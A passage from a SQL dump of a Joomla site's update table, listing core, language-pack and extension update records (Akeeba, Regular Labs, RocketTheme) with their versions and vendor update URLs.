1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(18218,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(18219,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(18220,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(18221,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(18222,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(18223,57,0,'English US','','pkg_en-US','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(18224,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(18225,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(18226,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(18227,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(18228,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(18229,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(18230,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(18231,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(18232,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(18233,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(18234,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(18235,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(18236,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(18237,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(18238,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(18239,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(18240,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(18241,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(18242,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(18243,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(18244,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(18245,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(18246,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(18247,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(18248,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.2.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/download/akeeba-backup/7-2-2.html',''),(18249,76,0,'Akeeba Frontend Framework (FEF)','','file_fef','file','',1,'1.0.13','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeebabackup.com/download/fef/1-0-13.html',''),(18250,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.2.2FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(18251,101,0,'FOF 3.x Stable','','lib_fof30','library','',1,'3.6.2','','http://cdn.akeebabackup.com/updates/fof3_file.xml','https://www.akeebabackup.com/download/fof3/3-6-2.html',''),(18252,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(18253,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(18254,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(18255,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(18256,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(18257,3,0,'French','','pkg_fr-FR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(18258,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(18259,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(18260,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(18261,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(18262,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(18263,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(18264,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(18265,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(18266,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(18267,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(18268,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(18269,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(18270,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(18271,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(18272,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(18273,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(18274,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(18275,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(18276,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(18277,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(18278,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(18279,3,0,'English US','','pkg_en-US','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(18280,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(18281,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(18282,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(18283,3,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(18284,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(18285,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(18286,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(18287,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(18288,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(18289,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(18290,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(18291,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(18292,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(18293,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(18294,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(18295,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(18296,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(18297,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(18298,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(18299,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(18300,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(18301,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(18302,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(18303,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(18304,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(18305,20,0,'RokSprocket Module','','mod_roksprocket','module','',0,'2.1.28','0802','http://updates.rockettheme.com/joomla/138/b61e70db','',''),(18306,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(18307,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.46','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(18308,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(18309,20,0,'RokCandy Extension','','rokcandy','plugin','system',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/302/2df8a4e2','',''),(18310,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(18311,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(18312,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(18313,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(18314,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(18315,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(18316,57,0,'French','','pkg_fr-FR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(18317,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(18318,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(18319,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(18320,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(18321,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(18322,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(18323,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(18324,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(18325,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(18326,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(18327,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(18328,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(18329,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(18330,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(18331,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(18332,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(18333,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(18334,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(18335,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(18336,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(18337,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(18338,57,0,'English US','','pkg_en-US','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(18339,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(18340,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(18341,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(18342,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(18343,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(18344,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(18345,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(18346,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(18347,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(18348,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(18349,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(18350,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(18351,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(18352,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(18353,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(18354,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(18355,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(18356,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(18357,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(18358,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(18359,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(18360,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(18361,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(18362,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(18363,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.2.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/download/akeeba-backup/7-2-2.html',''),(18364,76,0,'Akeeba Frontend Framework (FEF)','','file_fef','file','',1,'1.0.13','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeebabackup.com/download/fef/1-0-13.html',''),(18365,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.2.2FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(18366,101,0,'FOF 3.x Stable','','lib_fof30','library','',1,'3.6.2','','http://cdn.akeebabackup.com/updates/fof3_file.xml','https://www.akeebabackup.com/download/fof3/3-6-2.html',''),(18367,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(18368,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(18369,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(18370,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(18371,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(18372,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.2.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/download/akeeba-backup/7-2-2.html',''),(18373,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(18374,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(18375,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(18376,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(18377,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.2.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/download/akeeba-backup/7-2-2.html',''),(18378,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(18379,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(18380,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(18381,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(18382,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.2.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/download/akeeba-backup/7-2-2.html',''),(18383,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(18384,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(18385,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(18386,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(18387,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(18388,3,0,'French','','pkg_fr-FR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(18389,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(18390,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(18391,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(18392,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(18393,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(18394,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(18395,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(18396,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(18397,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(18398,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(18399,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(18400,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(18401,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(18402,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(18403,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(18404,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(18405,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(18406,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(18407,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(18408,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(18409,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(18410,3,0,'English US','','pkg_en-US','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(18411,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(18412,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(18413,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(18414,3,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(18415,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(18416,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(18417,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(18418,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(18419,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(18420,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(18421,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(18422,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(18423,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(18424,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(18425,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(18426,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(18427,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(18428,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(18429,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(18430,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(18431,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(18432,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(18433,3,0,'English 